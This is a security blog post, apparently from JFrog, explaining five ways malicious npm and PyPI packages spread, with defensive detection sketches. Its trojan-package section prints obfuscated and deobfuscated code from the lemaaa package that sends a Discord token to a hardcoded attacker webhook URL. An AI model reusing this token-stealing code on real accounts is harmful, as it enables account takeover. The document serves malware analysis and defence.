Five Examples of Infection Methods Attackers Use to Spread Malicious Packages

Malicious Software Packages Series Part 2 of 4: This is how JFrog’s security researchers found these malicious code attacks

Welcome to the second post in our series on Malicious Software Packages. This post focuses on the infection methods attackers use to spread malicious packages, and how the JFrog Security research team unveiled them.

If you missed the first blog, here are some key takeaways:

  • Third-party software packages can contain vulnerabilities or malicious code that is delivered through the software supply chain.
  • In a software supply chain attack, an adversary slips malicious code or an entire malicious component into a trusted piece of software, affecting the consumers of this software in the supply chain.
  • Attacking a supply chain with malicious open source packages has become a popular technique in the last few years, mainly because such attacks are technically easy and have high distribution potential.

Note: Many of the following software supply chain attack examples are based on actual data and malicious software packages identified and disclosed by the JFrog Security research team.

Review these infection methods and find out how JFrog’s security researchers discovered and disclosed them.

5 Infection Methods and Examples

1. Typosquatting

What is the typosquatting infection method?

Typosquatting is the practice of registering (or squatting on) a name that differs from a famous name by a slight typographical error. This practice applies to many resources, such as web pages, executable names, and software package names.

Say you buy the domain name gogle.com instead of the legitimate google.com, hoping that users will mistype the address and land on the illegitimate domain, which can then serve any attack payload, such as phishing or code injection. Attacks like this happen on the web all the time. The same thing now happens with malicious packages: attackers register them under names that are similar to popular package names but contain a small typo. They publish these malicious packages in popular package repositories such as NPM and PyPI, hoping that developers will occasionally make a typing error and install them.

In a recent trend, some maintainers and developers take an active role and reserve “typosquatting-prone” names for their projects to prevent attackers from taking control of them. Similarly, Google registered the gogle.com domain, so if you browse to gogle.com you will be redirected to google.com. Try it!

Typosquatting discovery: mplatlib package

JFrog’s Security Research team detected the following typosquatting infection using automated heuristic scanners that detect malicious activity in open-source packages. More on that in the fourth part of this blog series.

The scanners flagged the package mplatlib as malicious because of a code obfuscation technique used in it. Its name is also noticeably similar to that of the legitimate package matplotlib:

In the console log example below, a simple typo installed the malicious package mplatlib at the time of research:

The mplatlib package and other malicious packages were reported to PyPI and removed.
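The name-similarity signal can be approximated with an edit-distance check against a list of popular package names. The following is a minimal sketch, not the heuristic JFrog's scanners actually use: the function names, the candidate list, and the distance thresholds are all assumptions made for illustration.

```javascript
// Levenshtein edit distance: the minimum number of single-character
// insertions, deletions, or substitutions needed to turn `a` into `b`.
function editDistance(a, b) {
  // row[j] holds the distance between the current prefix of a and b.slice(0, j).
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diagonal = row[0]; // distance for (i - 1, j - 1)
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j]; // distance for (i - 1, j)
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diagonal + cost);
      diagonal = above;
    }
  }
  return row[b.length];
}

// Return the popular names that `candidate` is close to without being equal.
// maxDistance is an arbitrary threshold (assumption) that needs tuning.
function findLookalikes(candidate, popularNames, maxDistance = 2) {
  return popularNames.filter((name) => {
    const distance = editDistance(candidate, name);
    return distance > 0 && distance <= maxDistance;
  });
}

// Hypothetical popularity list; a real check would use download statistics.
console.log(findLookalikes("mplatlib", ["matplotlib", "requests", "numpy"], 3));
```

A name match alone does not prove malice, since legitimate packages can have similar names. It is best treated as one signal that raises the priority of a closer look at the package contents.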

2. Masquerading

What is the masquerading infection method?

Masquerading is when malware authors, or the attackers, publish a malicious package that impersonates a known package. They duplicate both the code and the metadata of the original project, which they want to impersonate, and add a small piece of malicious code to this duplicate, essentially building trojan packages.

This infection method resembles typosquatting in that it uses a name similar to that of the legitimate package. The difference is that the attackers aim to deceive developers through the package’s resemblance to the legitimate one rather than relying on accidental installs caused by typos.

Masquerading discovery: markedjs package

In February of this year, the JFrog Security research team uncovered the malicious package markedjs.

The name of the malicious markedjs package closely resembles that of the legitimate and popular marked package, and its metadata was copied from it, making the two packages hard to tell apart.

The repository URL, homepage, and description are the same, as can be seen in this comparison from the NPM repository:

The legitimate marked package:

The malicious package markedjs:

When comparing the malicious package (i.e., markedjs) code with the original package (i.e., marked) code, the only difference from the original package is one line in a single file marked in black:

The long line marked in black in the example above does not contain readable code, and it is placed among legitimate, legible lines, which makes it difficult to find without automated scanning or diffing tools. This line is the obfuscated malicious code. It is the only addition to the original legitimate package, so the modified package remains fully functional yet malicious.
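The kind of diffing that surfaces such a line can be sketched in a few lines of code. This is a simplified illustration rather than the tooling used in the research: it compares the two files line by line as sets, and the function name and the 500-character threshold are assumptions.

```javascript
// Return the lines that appear in the suspect file but not in the original,
// and mark the ones that are unusually long (a common sign of packed or
// obfuscated code). The length threshold is an arbitrary assumption.
function addedLines(originalSource, suspectSource, longLineThreshold = 500) {
  const originalLines = new Set(originalSource.split("\n"));
  return suspectSource
    .split("\n")
    .map((text, index) => ({ lineNumber: index + 1, text }))
    .filter(({ text }) => !originalLines.has(text))
    .map((entry) => ({
      ...entry,
      suspiciouslyLong: entry.text.length > longLineThreshold,
    }));
}

// Hypothetical file contents standing in for the original and the copy.
const original = "const a = 1;\nmodule.exports = a;";
const suspect = "const a = 1;\n" + "x".repeat(600) + "\nmodule.exports = a;";
console.log(addedLines(original, suspect).map((e) => e.lineNumber));
```

A set-based comparison ignores line order and moved code, so a proper diff tool is the better choice for real investigations. The sketch only shows why a single injected line stands out once the two packages are compared.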

3. Trojan Package

What is the trojan package infection method?

In the trojan package infection method, the attacker publishes a fully functional library but hides malicious code in it. As with masquerading, the malicious code is usually small or obfuscated, so it is hard to detect and to distinguish from the package’s legitimate functionality.

Trojan package discovery: lemaaa

JFrog’s scanners caught the malicious trojan package lemaaa and featured it in our published research in February this year.

This package is intended for use by malware authors to hack Discord accounts.

Discord is a communication application with hundreds of millions of registered users that allows for voice and video calls, text messaging, and media file sharing. The identity of a user in the Discord network is represented by a string called a Discord token, a set of letters and numbers that acts as an authorization code to access Discord’s servers. The token effectively serves as the user’s credentials, so a stolen token can give the attacker full access to the Discord account.

The lemaaa library (example pictured below) is a fully functional, published library used by attackers to steal Discord tokens. The interesting twist is that the trojan code in this package steals Discord tokens from any attacker who uses the library. When the library’s utility functions are called, the trojan code hijacks the secret Discord token passed to them. In other words, this malicious package attacks the attackers who want to use it to steal tokens.

The following code is the obfuscated malicious code that contains a payload that hijacks the supplied Discord token and sends it to a hardcoded web URL, essentially sending the token to the attacker-controlled site.

Obfuscated Code:

function _0xf28e(){const _0x159601=[
'DELETE','https://discord.com/api/v8/users/@me','11317570ajQRNl',
'application/json','token','random',',\x20\x22nitro_boost\x22:\x20','false',
'https://discord.com/api/v9/users/@me/mfa/totp/disable',
'https://discord.com/api/v8/guilds/','last_4','@gmail.com','true','1315DTGoNg',
',\x20\x22early_verified_bot_developer\x22:\x20',
'\x22,\x20\x22new_password\x22:\x20\x22','map','14370OOLNxq',
'There\x20is\x20no\x20bots',...

After deobfuscating this code, we can see that the utility function removeAllFriends() uses an HTTP POST request to send the supplied token to the attacker-controlled website.

Deobfuscated Code:

async function removeAllFriends(token) {
    ...
    var _0x3d283a = await _0x1aa523['json'](),
        malicious_webhook = 'https://canary.discord.com/api/webhooks/884196214302703676/PHJ1-GGrEOV7Zwz2RodFDpazJXmH6OnM60TNEX4RZ-VT-qW5sUUu-dZHCb3s5vApWHHz';
    await fetch(malicious_webhook, {
        'method': 'POST',
        'headers': {
            'Content-Type': 'application/json'
        },
        'body': JSON['stringify']({
            'content': '' + token
        })
    });
    ...
}

Since this function is part of a malware library, obfuscated code in it does not stand out, so the malware authors who use the library might trust it.
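The obfuscation style seen in the lemaaa excerpt, with hex-named identifiers such as _0x159601 and strings written with \x escapes, can be detected with simple pattern counting. The sketch below is a rough heuristic under stated assumptions: the function names and the threshold are ours and do not describe how JFrog's scanners work.

```javascript
// Count two patterns typical of the obfuscation shown above:
// identifiers like _0x1aa523 and hex escapes like \x20 in the source text.
function obfuscationSignals(source) {
  const hexIdentifiers = source.match(/\b_0x[0-9a-f]+\b/gi) || [];
  const hexEscapes = source.match(/\\x[0-9a-f]{2}/gi) || [];
  return {
    hexIdentifiers: hexIdentifiers.length,
    hexEscapes: hexEscapes.length,
  };
}

// minSignals is an arbitrary threshold (assumption); tune it on real data.
function looksObfuscated(source, minSignals = 3) {
  const { hexIdentifiers, hexEscapes } = obfuscationSignals(source);
  return hexIdentifiers + hexEscapes >= minSignals;
}

// String.raw keeps the backslashes literal, as they would appear in a file.
const sample = String.raw`function _0xf28e(){const _0x159601=['DELETE',',\x20\x22nitro_boost\x22:\x20'];}`;
console.log(obfuscationSignals(sample), looksObfuscated(sample));
```

Minified or bundled code can trigger similar patterns, so a hit is a reason to inspect the package manually, not a verdict on its own.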

4. Dependency Confusion

What is the dependency confusion infection method?

Dependency confusion exploits a vulnerability in the way that many package managers download dependencies during a build process.

In the dependency confusion method, the attacker learns the names of a target’s internal packages and publishes a malicious package with exactly the same name on an external public repository. The attacker then assigns a very high version number to the published package. In their default configuration, many package managers prefer the external malicious package because of its high version number over a lower version from the legitimate internal repository.
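The resolution behavior described above can be modeled in a few lines. This is a simplified simulation, not the logic of any specific package manager: the package name acme-internal-utils, the candidate objects, and both resolver functions are hypothetical.

```javascript
// Compare two dotted numeric versions such as "1.4.2" and "9998.987.376".
// Returns 1 if a > b, -1 if a < b, and 0 if they are equal.
function compareVersions(a, b) {
  const partsA = a.split(".").map(Number);
  const partsB = b.split(".").map(Number);
  for (let i = 0; i < Math.max(partsA.length, partsB.length); i++) {
    const diff = (partsA[i] || 0) - (partsB[i] || 0);
    if (diff !== 0) return Math.sign(diff);
  }
  return 0;
}

// Naive resolver: pools candidates from all registries and picks the
// highest version, which is the behavior dependency confusion abuses.
function naiveResolve(candidates) {
  if (candidates.length === 0) return null;
  return candidates.reduce((best, candidate) =>
    compareVersions(candidate.version, best.version) > 0 ? candidate : best
  );
}

// Safer resolver: names known to be internal are only ever taken from
// the internal registry, regardless of version numbers elsewhere.
function scopedResolve(packageName, candidates, internalNames) {
  const pool = internalNames.has(packageName)
    ? candidates.filter((candidate) => candidate.source === "internal")
    : candidates;
  return naiveResolve(pool);
}

// Hypothetical scenario: same name on both registries.
const candidates = [
  { source: "internal", version: "1.4.2" },
  { source: "public", version: "9998.987.376" },
];
const internalNames = new Set(["acme-internal-utils"]);
console.log(naiveResolve(candidates).source);
console.log(scopedResolve("acme-internal-utils", candidates, internalNames).source);
```

The second resolver reflects the general idea behind common mitigations: decide where a package may come from by its name or namespace before comparing versions.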

The following screenshot shows an example of a malicious package created as part of research published last year by security researcher Alex Birsan. It is a publicly available package in PyPI with a name that looks like that of an internal Netflix package and a very high version number.

With this attack, Birsan successfully exploited Netflix, as well as Apple and Microsoft, by making their servers download the malicious external package instead of the legitimate internal one.

Dependency confusion attack discovery: mrg-message-broker 9998.987.376

Research published by the JFrog Security research team in December 2021 identified a malicious package that spread using a dependency confusion attack.

JFrog’s security researchers detected this attack (example pictured below) quickly because of the implausibly high version number, which is not typical of standard product versioning. The payload of this malicious package was an environment variable stealer. We will present a deep analysis of this kind of payload and others in the next part of this malicious packages blog series.
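A version number like 9998.987.376 can be flagged with a very simple check on the major component. The following is a minimal sketch: the function name and the threshold of 1000 are assumptions, not values taken from JFrog's scanners.

```javascript
// Flag versions whose major component is far above what a normal release
// cadence would produce. The default threshold is an arbitrary assumption.
function hasSuspiciousVersion(version, maxMajor = 1000) {
  const major = Number.parseInt(version.split(".")[0], 10);
  return Number.isFinite(major) && major > maxMajor;
}

console.log(hasSuspiciousVersion("9998.987.376"));
console.log(hasSuspiciousVersion("1.4.2"));
```

Projects that use calendar versioning have majors such as 2022, so a fixed threshold produces false positives there. Comparing the public version against the version published in the internal repository would be a more precise signal.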

5. Software Package Hijacking

What is the software package hijacking infection method?

The last infection method is software package hijacking.

This method involves taking over a legitimate known package and pushing malicious code into it. While this is not an easy task, it’s very effective because it can take advantage of the popularity of available packages for a high infection rate.

Software package hijacking is usually performed by hacking maintainers’ and developers’ accounts or by injecting hidden or obfuscated malicious code as part of a legitimate code contribution to an open-source project.

Software hijacking discovery: ua-parser-js

In October 2021, attackers hijacked a well-known, legitimate package, ua-parser-js, by taking over a maintainer account and pushing malicious code to several versions of the package (example below).

Source: NPMJS

This popular package has more than 1.5 billion downloads to date. What’s notable here is that the malicious code injected into this package was the same as in another malicious package originally masquerading as the legitimate ua-parser-js package.

Below is the announcement by the developer of the ua-parser-js package saying that they believe someone hijacked and published malicious versions of it:

“I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware,” announced Faisal Salman, the developer behind “ua-parser-js.”
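Once compromised versions are announced like this, a project can check its installed dependencies against them. The sketch below assumes a flat map of package names to installed versions, which is a hypothetical simplification of what a lockfile provides. The version list comes from the announcement quoted above.

```javascript
// Versions named in the maintainer's announcement quoted above.
const compromisedVersions = new Map([
  ["ua-parser-js", new Set(["0.7.29", "0.8.0", "1.0.0"])],
]);

// `installed` is a hypothetical flat map of package name to exact version,
// for example one derived from a lockfile.
function findCompromised(installed, denylist = compromisedVersions) {
  return Object.entries(installed)
    .filter(([name, version]) => {
      const badVersions = denylist.get(name);
      return badVersions !== undefined && badVersions.has(version);
    })
    .map(([name, version]) => `${name}@${version}`);
}

// Hypothetical project dependencies.
console.log(findCompromised({ "ua-parser-js": "0.7.29", express: "4.18.2" }));
```

In practice, advisories from the registry or a software composition analysis tool replace the hardcoded list, but the matching step is the same.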

After this disclosure and other similar incidents at that time, GitHub enforced two-factor authentication for maintainers and administrators of popular npm packages.

Software hijacking discovery: Colors and Faker incident

Software package hijacking can be carried out not only by malicious third parties but also by the developers and maintainers of the projects themselves, as in the notable case of the Colors and Faker open source packages. Both NPM packages are very popular with Node.js developers, with millions of weekly downloads, and both were developed by the same author. Colors allows developers to add styles, fonts, and colors to the Node.js console, and Faker allows them to generate data for testing purposes during development.

Early this year, this author sabotaged the two packages to protest the use of their code by large corporations that do not give back to the open source community. They added an infinite loop to the code, which bricked thousands of projects that depend on these packages. A single modification to the package code was enough to break the products of many companies.

Software hijacking discovery: Hijacking with phishing attacks

In August 2022, the PyPI team detected and reported on a phishing campaign targeting PyPI developers. The PyPI team mentioned that this was the first known phishing attack against the PyPI repository. In this attack, the attackers created a phishing website that asked PyPI users to provide their credentials as part of a supposedly mandatory “validation” process:

The Phishing website. Image Source: PyPI on Twitter

The PyPI team detected and removed three malicious releases of legitimate packages that were compromised in this attack and urged developers to configure two-factor authentication (2FA) on their user accounts to protect against this kind of phishing attack. The Google Open Source Security Team, a sponsor of the Python Software Foundation, has also provided a limited number of 2FA security keys to maintainers of critical PyPI projects.

Software hijacking discovery: Hijacking through domain takeover

Hijacking software packages by taking over maintainers’ accounts is not limited to phishing attacks and credential theft. Attackers become more sophisticated as time goes by, and in May this year, JFrog Security researchers published a thorough analysis of a new hijacking method that uses expired domain takeovers. In this method, attackers register the expired domains of package maintainers’ email addresses, recreate the email addresses under the newly registered domain, initiate a password recovery process, and take control of the maintainer’s account. The research was conducted on the NPM repository, where more than 3,000 packages were found to be vulnerable because their maintainers’ email domains had expired. This is the latest trend in malicious package infection methods. We have seen a rise in these attacks in the past months, so expect to see more of them soon.
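Defenders can audit for this exposure by extracting the email domains of a package's maintainers and checking whether each domain is still registered. The sketch below covers only the extraction and filtering steps. The maintainer objects are hypothetical, and the isDomainRegistered predicate is an assumption that stands in for a real WHOIS or DNS lookup, which is out of scope here.

```javascript
// Extract the lowercased domain part of an email address, or null if the
// address has no "@".
function emailDomain(email) {
  const at = email.lastIndexOf("@");
  return at === -1 ? null : email.slice(at + 1).toLowerCase();
}

// Return the maintainers whose email domain is no longer registered.
// `isDomainRegistered` is a caller-supplied predicate (assumption): in a
// real audit it would wrap a WHOIS or DNS query.
function findAtRiskMaintainers(maintainers, isDomainRegistered) {
  return maintainers
    .map((maintainer) => ({ ...maintainer, domain: emailDomain(maintainer.email) }))
    .filter((m) => m.domain !== null && !isDomainRegistered(m.domain));
}

// Hypothetical data: a stubbed registry of live domains and two maintainers.
const liveDomains = new Set(["example.com"]);
const maintainers = [
  { name: "alice", email: "alice@example.com" },
  { name: "bob", email: "bob@lapsed-domain.example" },
];
console.log(findAtRiskMaintainers(maintainers, (d) => liveDomains.has(d)));
```

Keeping the lookup behind a predicate makes the audit logic easy to test offline and lets the lookup method be swapped without touching the rest of the code.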

As you can probably tell, these infection methods pose a serious risk to DevOps teams and consumers.

Now that we’ve covered the five infection methods attackers use to spread malicious packages, the next post in the “Malicious Software Packages” series will discuss the payload phase that follows a successful infection. We’ll analyze the payloads used in malicious software packages, show how attackers hide them in code using obfuscation techniques, and give code examples from attacks discovered by the JFrog Security research team.


This educational series has been adapted from the webinar Identifying and Avoiding Malicious Packages, a technical showcase of the different types of malicious packages prevalent today in the PyPI (Python) and npm (Node.js) package repositories.